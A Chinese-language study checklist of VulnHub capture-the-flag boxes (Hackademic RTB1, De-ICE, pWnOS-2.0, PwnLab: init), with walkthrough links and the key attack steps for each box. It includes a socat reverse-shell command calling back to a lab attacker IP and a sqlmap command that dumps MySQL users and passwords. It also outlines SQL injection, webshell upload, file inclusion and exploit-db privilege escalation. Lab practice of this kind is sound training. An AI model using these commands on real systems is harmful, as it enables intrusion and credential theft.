靶场测试系列(已办清单)
在线靶场
https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=On-Line_apps
总清单
http://www.hackingarticles.in/capture-flag-challenges/
Hackademic: RTB1
地址
https://www.vulnhub.com/entry/hackademic-rtb1,17/
wp
http://www.hackingarticles.in/hack-the-hackademic-rtb1-vm-boot-to-root/
重点
sql
注入获取 wordpress
管理员密码,然后后台上传拿 shell
.
使用
python -c 'import pty; pty.spawn("/bin/bash")'
将 shell
转成 tty shell
用于提权
然后用
https://www.exploit-db.com/download/40839
提权
转 交互式 shell 的另一种方式
攻击者的机器,监听
socat file:`tty`,raw,echo=0 tcp-listen:4444
被攻击的机器端执行,反弹 shell
./socat_i386_static exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.245.128:4444
参考
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
https://github.com/static-linux/static-binaries-i386/blob/master/socat-2.0.0-b8.tar.gz
https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64
De-ICE
地址
https://www.vulnhub.com/entry/de-ice-s1120,10/
wp
http://www.hackingarticles.in/hack-the-de-ice-s1-120-vm-boot-to-root/
重点
sql
注入获取 数据库用户名和密码
sqlmap -u http://192.168.1.120/products.php?id=1 -D mysql --users --passwords --batch
用获取到的用户名和密码尝试登陆 ssh
然后用 linux-exploit-suggester
找 exp
,最后用
https://www.exploit-db.com/download/40839
拿到 root
一定按流程走,先搜集漏洞信息,后面综合考虑利用。
pWnOS-2.0
地址
https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
wp
http://www.hackingarticles.in/hack-the-pwnos-2-0-boot-2-root-challenge/
重点
- 利用 开源系统的漏洞,生成用户名
- 登陆后文件上传漏洞
getshell
- 找
exp
提权
PwnLab: init
地址
https://www.vulnhub.com/entry/pwnlab-init,158/
wp
http://www.hackingarticles.in/penetration-testing-pwnlab-ctf-challenge/
重点
- 文件包含( 限制了文件结尾 ) +
php
流 获取php
文件内容 - 登陆后上传图片,然后利用包含获取
shell
- 使用
exp
提权